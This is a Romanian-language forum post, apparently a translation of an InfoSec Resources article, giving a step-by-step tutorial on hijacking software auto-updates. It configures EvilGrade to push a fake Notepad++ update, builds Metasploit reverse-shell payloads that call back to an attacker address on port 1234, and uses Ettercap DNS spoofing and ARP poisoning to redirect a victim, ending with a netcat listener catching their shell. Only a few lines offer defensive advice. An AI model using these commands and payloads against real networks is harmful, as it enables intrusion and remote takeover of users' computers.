Wubi Posted June 23, 2012 Report Posted June 23, 2012 Functioneaza pe Java, AppleUpdate, Google Analytics, Skype, Blackberry si multe altele...IntroducereCu totii stim ca hackerii incearca in mod constant informatii private intrand in sistemul victimei, sau de asemenea, exploatand software-urile instalate in sistem sau alte cai. Conform unui raport, mai mult de 60 % dintre userii Adobe Reader folosesc versiuni neactualizate, acestea fiind vulnerabile atacurilor. Utilizand actualizari de rutina pentru software, utilizatorii se pot proteja, actualizand patch-uri de rutina ce protejeaza impotriva vulnerabilitatilor deja cunoscute, reducand sansele de a fi "pradati" de catre hackeri.Cele mai folosite software-uri, cum ar fi MS Office, Adobe Flash si PDF reader(la fel de bine ca si browserele), sunt tintele majore ale exploatarilor daca sunt lasate neactualizate. In trecut false actualizari pentru Firefox, IE, etc. au facut sa apara mesaje care informau utilizatorii ca versiunea actualizata pentru un plugin sau browser era valabila, facand ca userul sa isi actualizeze software-urile. Spre exemplu, pagina ii va spune utilizatorului ca actualizarea versiunii flash este urgenta. Odata ce utilizatorul instaleaza falsul update, va descarca un continut malitios(de ex, Zeus Trojan) in calculatorul victimei. Atacuri similare au fost facute in trecut pe diverse browsere.In mod normal, daca este un update pentru Firefox, notificarile apar ca pop-ups nu ca pagini web. Un mod mai bun de a verifica daca este o actualizare noua in Firefox este sa mergeti la Help option, Selectezi "About Firefox", iar daca browserul are nevoie de actualizare, sigur va aparea ceva ca "apply update".Daca nu esti sigur de aplicatiile tale, 1. Verifica site-ul oficial sau site-ul aplicatiei2. Pentru a verifica update-urile disponibile, mergi la adresa Firefox Web Browser — Plugin Check & Updates . URL-ul iti va scana browser-ul Firefox pentru actualizari ale pluginurilor instalate si va oferi informatii despre spunand daca pluginul este vulnerabil sau are nevoie de o actualizare.Majoritatea oamenilor evita actualizarile ce pot deveni enervante uneori. Dar daca detinem informatii sensibile, in sistemul propriu, atunci actualizarile sunt importante si ar trebui sa fie prioritatea numarul unu.Daca te gandesti, cati oameni sunt intr`adevar atenti in legatura cu actualizarile, tipul de actualizare, sau link-ul de unde o descarca si instaleaza?! Evident, sunt foarte putini oameni care sunt intr`adevar atenti si vigilenti in legatura cu actualizarile. O cale efectiva de a exploata utilizatorul este sa utilizezi tool-uri ca EvilGrade.Inainte de a trece pe EvilGrade, sa aruncam o privire la un bash script, ce poate in mod automat sa faca Manning in Middle si sa exploateze userul oferindui o falsa actualizare. Asta se face setand un DHCP si un server web. Odata ce a fost realizat creaza un exploit folosind msf si asteapta ca victima sa se conecteze la falsa actualizare apoi ruleaza exploit-ul. Odata ce falsul update este executat, calculatorul victimei este exploatat si creaza acces la sistemul victimei.Putem extrage acest bash script folosind tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz si copiind folderul 'www' in /var/www (cp www/* /var/www/). Urmeaza editarea metasploit-fakeupdate.sh cu interfata internet-ului. Si vom rula metasploit-fakeupdate.sh. Odata ce acesti pasi sunt urmati, asteapta ca tinta, sa se conecteze.Comenzile sunt urmatoareletar zxf metasploit-fakeUpdate\[v0.1.4\].tar.gzcd metasploit-fakeUpdate\[v0.1.4\]cp www/* /var/wwwifconfigkate metasploit-fakeUpdate.shbash metasploit-fakeUpdate.shDespre EvilGrade:EvilGrade e un framework ce exploateaza slabiciunile serviciilor de actualizari automate ale multor pachete de software-uri comune si atacul acestui framework este unul dintre cele mai bune exemple pentru exploatarea clientului. Acest framework insala sistemul sa creada ca acolo este semnalata o actualizare valabila pentru produs, facand utilizatorul sa instaleze actualizarea, acesta fiind beneficiul atacatorului. Acest tip de atac este un pic dificil de detectat de un utilizator normal, deoarece acesta nu vede nimic suspicios si actualizarea pare in regula.Putem folosi acest framework in combinatie cu DNS spoofing sau Man-in-the-middle attack pentru a crea o actualizare software-urilor. Acest lucru pacaleste victima sa descarce actualizarea, in acest fel fiind executat codul nostru malitios.EvilGrade suporta multe sowftware-uri cunoscute, cum ar fi Notepad, iTunes, Java plug-in, WinZip, Winamp, DAP, OpenOffices, Linkedln, Speedbit, etc.EvilGrade ia avantajele multor aplicatii, deoarece majoritatea acestora nu verifica nici continutul actualizarii, nici serverul principal de actualizari. De fapt, acest tip de atac face ca atacatorul sa modifice traficul DNS al victimei si sa il transforme in alte adrese ip controlate de acesta.Scenariul general al procesului de actualizare:O aplicatie incepe procesul de actualizare si incearca sa ceara de la acesta hostul dns server (cum ar fi, de exemplu, update.notepadplus.com). Serverul DNS raspunde, de asemenea, cu ceva informatii. Acum aplicatia ia fisierul lastupdate.xml de la update.app1.com si analizeaza fisierul actualizat. Daca detecteaza o noua actualizare, atunci o va instala.Figura simpla a procesului general de actualizarePoti descarca ISR-evilgrade de pe http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gzPasi pentru a instala EvilGrade:Pasul 1: Descarca si extrage EvilGrade http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gz . Pentru extragere, comanda este: http://www.infobytesec.com/down/isr-evilgrade-2.0.0.tar.gzPasul 2: Descarca modulul Perl cerut daca e necesar si ruleaza evilgrade utilizand comanda$. /evilgradeNota: Cateodata, in timpul rularii EvilGrade, putem avea cateva probleme, cum ar fi cele de mai jos, spre exemplu: Nu poate fi localizat: Data/Dump.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at isrcore/Shell.pm line 28.Pentru a rezolva asta, rulam comanda in terminal cpan Data::DumpInainte de a ataca tinta, vom putea fi nevoiti sa investigam aplicatia tinta. Vom fi nevoiti sa creem o actualizare falsa folosind EvilGrade pentru a o injecta in calculatorul victimei. Pentru a insira toate aplicatiie suportate, utilizeaza comanda show modules in consola; mai jos sunt modulele enumerate:In urmatorul exemplu voi crea o actualizare malitioase in notepad ++. Pentru a configura modulul specificat, o comanda simlpa ar putea fievilgrade>configure notepadplusPentru a vizualiza optiunile pentru modulul selectat, utilizeaza comanda "show options".Nota: In imagine, adresa "Virtual Host" este importanta - aceasta va fi folosita mai tarziu pentru atac.Urmatorul pas ar fi setarea agentului. Agentul nu este nimic mai mult decat o actualizare binara falsa. Va trebui sa setam "drumul" spre unde aceasta este localizata; putem, de asemenea, sa implementam o actualizare dinamica binara falsa, unde vom putea genera orice plata a Metaspoilt. Putem configura agentul cu orice tip de plata utilizand msfpayload ca, spre exemplu, shell_reverse_tcp. Putem creea payload-ul si sa il utilizam cu EvilGrade sau putem creea un payload in afara framework-ului.Metoda 1: Pentru a creea un payload in EvilGrade, comanda pe care o vom folosi esteevilgrade (notepadplus)>set agent ‘["/pentest/exploits/framework3/msfpayload windows/shell_reverse_tcp LHOST=192.168.75.130 LPORT=1234 X > <%OUT%>/tmp/notepadplus.exe<%OUT%>"]‘Aici, setam actualizarea falsa in payload-ul “windows/shell_reverse_tcp” utilizand un shell pentru a ne conecta la adresa 192.168.75.130 (adresa ip a atacatorului) port 1234. Eticheta <%OUT%><%OUT> este una speciala pentru a detecta unde va fi generat output-ul.Metoda 2: Creeaza un payload in afara EvilGrade, utilizand msfpayload.[root@bt]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.75.130 LPORT=1234 X > /tmp/reverse-shell.exeAcum putem numi acest payload in EvilGrade utilizand urmatoarea comanda.evilgrade(notepadplus)>set agent /tmp/reverse-shell.exeOdata ce avem totul gata, trebuie sa deschidem serverul EvilGrade. Acest lucru se face simplu selectand comanda START.Acum ca avem serverul deschis, urmatorul pas ar fi sa configuram atacul Man in the Middle utilizand Ettercap. Cum am spus, EvilGrade, impreuna cu combinatia DNS spoofing sau atacul Man in the Middle, poate fi folosit pentru a pacali victima. Sa configuram etter.dns.pico /usr/share/ettercap/etter.dnsAici trebuie sa schimbam adresa VirtualHost inlocuind-o cu adresa noastra ip i.e. , notepad-plus.sourceforge.net = adresa ip a atacatorului. Odata ce e confgurata, deschidem Ettercap, de vreme ce e o unealta care merge bine pe aracuri MITM in LAN.Pentru a deschide Ettercap, scrie comanda in terminal - ettercap -GApasa Sniff -> Unified sniffing -> chose your network interface card. Aici e eth0Odata ce network interface card e selectat, activeaza plugin-ul dns_spoof dand dublu click pe el. Acest plugin poate fi folosit pentru a redirectiona cererea victimei catre serverul EvilGrade. Apasa Plugins -> Manage the plugins -> Dublu click dns_spoof.Acum sa scanam hosturile in reteaua noastra. Apasa Hosts -> Scan for hosts.Odata ce scanarea pentru hosturi este facuta, selecteaza host list pentru a vizualiza hosturile gasite in retea. Rezultatul ar trebui sa fie similar acestuiaDe asemenea, trebuie sa facem un atac MIMT pentru a intercepta toate datele pe retea. Click Mitm -> Arp poisoning -> check "Sniff remote connection". Inainte de a incepe, mai este un lucru important pe care ar trebui sa-l facem, acesta fiind setarea tintei. Adauga adresa router-ului catre tinta 1 facand click pe "Add to target 1" si adresa ip a victimei catre tinta 2 facand click pe "Add to target 2".Odata ce asta e gata, utilizeaza Netcat pentru a vizualiza portul in EvilGrade. In acest caz este 1234.Acum, asteapta ca victima sa deschida notepad plus. Odata deschis, acesteia ii va aparea un pop-up care va cere o actualizare. Daca victima continua cu actualizarile, vei primi shell-ul lor de unde il vom putea exploata.Concluzie:EvilGrade este o unealta foarte puternica pentru "spargerea" unui sistem. Cu ajutorul uneltelor ca ettercap, letalitatea acestuia este marita. Framework-ul este o platforma independenta, adica , unealta poate "sparge" orice sistem. O protectie impotriva acestuia poate fi sa nu actualizati nici un program daca actualizarile vin de la o retea neindentificata.Cea mai buna parte a acestei unelte este ca atacul nu este doar prentru sistemele Windows, ci pentru orice mecanism vulnerabil. Singurul lucru pe care atacatorul il are de facut este sa hackeze procesul de actualizare de pe computerul tinta printr-o retea. Dupa asta, game over.EN: InfoSec Resources – Hacking AutoUpdate by Injecting Fake Updates Quote
ForTestingPurposes Posted June 28, 2012 Report Posted June 28, 2012 interesant, o sa-l citesc mai diseara Quote